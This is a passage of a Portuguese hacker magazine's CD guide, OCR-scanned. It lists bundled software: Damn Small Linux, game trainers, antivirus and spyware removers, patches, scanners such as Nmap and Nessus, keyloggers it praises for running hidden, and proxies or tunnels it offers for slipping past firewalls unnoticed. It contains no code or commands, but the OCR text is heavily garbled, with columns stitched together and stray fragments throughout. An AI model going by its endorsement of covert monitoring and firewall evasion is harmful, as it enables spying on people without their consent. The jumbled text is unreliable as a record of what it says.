arquivo de log. Esta era a principal função dos 
softwares e hardwares para key logging. Apesar de 
parecer muito com o chamado “grampo”, esta 
técnica evoluiu muito e hoje é capaz de não.apenas 
registrar as informações que passam pelo teclado, mas 
também de gravar cada tela aberta, site visitado e 
programa rodado. Existem até programas que anulam os 
key loggers. Outro detalhe que não pode deixar de ser 
lembrado é que esses fantásticos programas rodam de forma 


oculta. Eles não gastam memória e só quem o instalou sabe que ele 


está rodando. É o famoso “estamos de olho! !” 


Damn Small Linux 
O Debian microscópico 
Com apenas 50Mb, o Damn Small Linux tem 
todos os principais aplicativos de uma distribui- 
, AT NW ção Linux, com a vantagem e a qualidade da 
l marca Debian. 
É GA Na verdade, o Damn é inspirado no Knoppix 
N (até por isso ele é um LiveCD) que, por sua vez, 

w é descendente do Debian. Apesar do tamanho 

E: reduzido, é possível visualizar micros remotamente 

(como VNC Viewer), rodar web servers, bater papo (ICQ, IRC, 
etc.), ouvir música (XMMS)e muito mais com o “micro Debian”. 
Se você quiser, também é possível instalá-lo direto no seu HD e 
reforçar o seu pacote de programas usando os excelentes 
recursos do apt-get. Para experimentá-lo, basta reiniciar sua 
máquina com o CD da H4CK3R 12 no drive e escolher as configu- 
rações que se encaixam melhor no seu hardware. Confira alguns 
dos softwares incluídos no Damn Small Linux: 


—apt-utils - gzip - net-tools — tinyirc - vorbis-tools 
—zile (editor tipo Emacs) — links (browser) 
=sylpheed (e-mail) - xmms(mp3) - FLWriter (processador 
de texto) - Naim (IM) - Xpdf - Fluxbox (interface gráfica) 
— Monkey web server - VNCviewer 


Mais informações: Atip:/www.damnsmalilinux.org/ 
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Windows, Red Hat, 
E, , SuSE, Debian Rust heb rante Openbsp) 
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> WarCraft Ni 
>> Commandos 2 
> UT2003 

> Wolfstein 3D 
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Trainers 
Para roubar e ganhar! 

Confira a seguir a lista de jogos que poderão ser facilitados com 
o uso dos trainers presentes no CD desta edição da H4CK3R 


007 NigthFire 
Age of Mitology 
Airport Tycoon 
AOE: The Conquerors Trainer 
Battlefield 1942 

Black and White 

C&C: Red Alert 2 

C&C: Tiberian Sun 
Carmageddon 2 

Civilization 3 

Command & Conquer General 
Commandos 2 

Dave Mirra BMX Trainer 4% Ed 
Fifa 2003 Trainer 

Need for Speed - Hot Pursuit 2 

No One Lives Forever 2 

Quake 3 

Return to Castle Wolfenstein 

Serious Sam 2 

SimCity 4 

Spider-Man: The Movie Game 

The Sims, House Party 

Tomb Raider 4 
Unreal Tournament 
WarCraft 3 


GUIA DO CD 


Segurança 


Diga não às brechas! 


Com mais uma onda de infecções em massa, hordas de spywares e muitos scripts maliciosos chegando por todos os 
lados, o melhor a fazer é arrumar a casa e não deixar brecha alguma para a entrada de visitantes indesejados. Para isso, 
atualize sua coleção de patches, correções de segurança e vacinas para Windows e Linux. Confira a lista completa e os 
destaques de cada uma das categorias: 


Softwares para Windows 


18 Spyllot-Search E Destroy Lise at your own risk! 


Spybot - Search & Destroy 1.2 

Remove vários tipos de spywares de seu sistema, como spybots, 
keyloggers e adwares. Possui várias ferramentas, inclusive uma opção para 
imunizar o seu sistema, bloqueando alguns spywares antes mesmo que sejam 
instalados. Também possui um modo simples, apenas com as funções 
principais, para usuários iniciantes 


be orla at an se ad ot ta mao do hem 


W32.Blaster.Worm Removal Tool 1.0.2 

Ferramenta para remover o vírus W32.Blaster. Worm. Com.ela, 
você termina os processos do vírus e também deleta todos os 
arquivos e entradas no registro criados por ele 


Outros destaques 


Kerio Personal Firewall 2.1.5 Kryptel Lite 1.1 

ZoneAlarm 3.7 XSecure 3.02 

W32.Frethem Removal Tool 1.0,2 ProxyChecker 3.27 

W32.Sobig.AQmm Removal Tool 1.0.0 Jana Server 2.33 

W32.Bugbear.BGmm Removal Tool 1.0.2 ProxyXQ Server 2.0 
Backdoor.Winshell.50 Removal Tool 1.0.1 WinGate VPN 1.0.6 

Nimda Removal Tool 1.0 Check Point VPN-1 SecuRemote - Win 9X 
PGP 8.0.2 McAfee Firewall 4.02 


Ashampoo Privacy Protector 1.00 BP5 Spyware and Adware Remover 7.2 
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Softwares para Linux - £Z£4 


Continue ganhando Pacotes com correções de falhas para; 


Snort 2.0.1 ; e 1d] e roubando “img, Windows, Red Hat, 

Mais recente versão do famoso software para mais mos aad ERRA 
detecção de invasores. É capaz de gerar uma > WarCraft tl 
análise em tempo real da performance do tráfego, 2> Commandos 2 Clive pais ferramentas 
dos pacotes logados no IP da rede e do protocolo, a vi2003 E á É 

& > Wolfstein 3D 

que pode ser usado para detectar uma variedade 
de ataques e invasões, como a saúde das portas 
rastreadas e os ataques CG! 


Panda Antivirus for Linux 6.4 

Poderoso antivirus para servidores Linux e desktops, Pode ser 
utilizado via linha de comando. Seu objetivo principal é realizar 
análises e desinfectar as estações Windows e DOS conectadas no 
seu servidor Linux 


Microsoft Nes” 


Outros destaques Wi ndows E 


Guarddog 2.1.7 


Ettercap 0.6b LaBrea 
Nmap 3.30-1 ProxyAuth 1.0 
Seahorse 0.6.2 Squid 2.5 
Nessus 2.0.7 Hdup 1.6.18 
lpkungfu 0.5.0 Lids 2.0.3rc5 for kernel 2.6.0-test2 Linux Red Hat - PostFIX 
Firewall Linuxman 0.3 Kalendar 0.59 Linux Red Hat - Gnome 
Linux Debian - UnZip 
Linux Debian - Man Update 
Patches Linux Debian - Auto Respond 
Linux Debian - Netris 
Microsoft KB816456 Linux Debian - Pearl 
Microsoft KB821557 Linux Debian - KDE 
Microsoft KB823980 Linux Debian - Pam SQL 
Microsoft KB823803 Linux Debian - XPCD 
Microsoft KB815495 Linux Debian - X Tokkaetama 
Microsoft KB822925 Linux Debian - CD-Recording 
Microsoft KB823718 Linux Debian - PHPGroupware 
Microsoft KB823559 Linux Debian - Kernel 
Microsoft KB817606 Linux Debian - zBlast 
Microsoft KB822679 Unix OpenBSD - Local Updates 
Linux Red Hat - SMB PAM Linux Suse - Kernel 


Linux Red Hat - Up2dale GPG Linux Suse - POStFIX 
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= | of Defeat LiHa 
Mude seus jogos E Interaja Counter: Strike =] Day H 


de maneira mais profunda; 
Nessa edição: 
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Novissimas missoes ses para) É l 
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Navegue pelo submundo da Internet 
& saiba como ter os principais 
lançamentos antes de todo mundo! 
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>>>>Espisnagem 


perde to As melhores soluções para gravar o 

MultiProxy 1.2a Navegue anonimamente e acelere sua conexão que está sendo digitado no seu 

Filetopia Bouncer Esconde o IP de usuários que utilizam a rede de 1 ] 
Es computador, registros e até movimento 

Proxy Server List Hunter 1.78 Procura por servidores proxy [o (0) mouse. Inclui antídotos para anular 
a sistemas de monitoração 

HTTP Tunnel 2.3 Use o ICQ e outros programas de mensagem sem 
que servidores e firewalls o detectem | z 

Surf Secret Apaga os rastros deixados pelo browser - 

Anonymity 4 Proxy 2.52 Navegue e participe de chats sem ser 
identificado 

Check Proxy Professional Demo v3.20 Encontre servidores de 
proxies anônimos rapidamente 

Clean Space 8.24 Elimina vestígios de cache e históricos de 
diversos programas 

Socks2HTTP Beta 0.96 Converta requisições socks5 em HTTP, 
para driblar o firewall 

Libra FTP daemon 1.3.4 Servidor de FTP anônimo para Linux 

Anonymous Network Project Uma rede peer-to-peer baseada 
no modelo PipeNet. Constrói dinamicamente túneis encriptados e com 
uma série de nós de rede, deixando o usuário anônimo ao se conectar 
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emote device management 
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Policies 
Comprehensive 
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Protecting 
Enterprise A 
Remote access fi 
CIO Update Answer Six Key Questions 


>>>>Segurança  rogramas pa RSDESS Fa E 
Pacote especial com mais de 60 programas : 
e patches para Windows e Linux que vão 


tornar seu PC uma fortaleza. Inclui: E 
- Antivírus 

- Firewall command & Con 
- Removedor de spyware Co E & Ce | T an Su 
- Removedores dos principais vírus da atualidade rmageddon 24 
- PGP 8.0.2 qa a 

- Proxies E É E 
- Soluções VPN 

- Sniffers 100: aine 
- Loggers or S ot Pursuit 2 
- Scanner Nmap 3.30-1 o One Lives Forever 

- Gerenciador de chaves 


- Honeypots f Pora Ad Sr qe : 
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Placa de vídeo com 18 ME, resolução de 800x600 pixels e 16 milhões de cores; Placa de som. 
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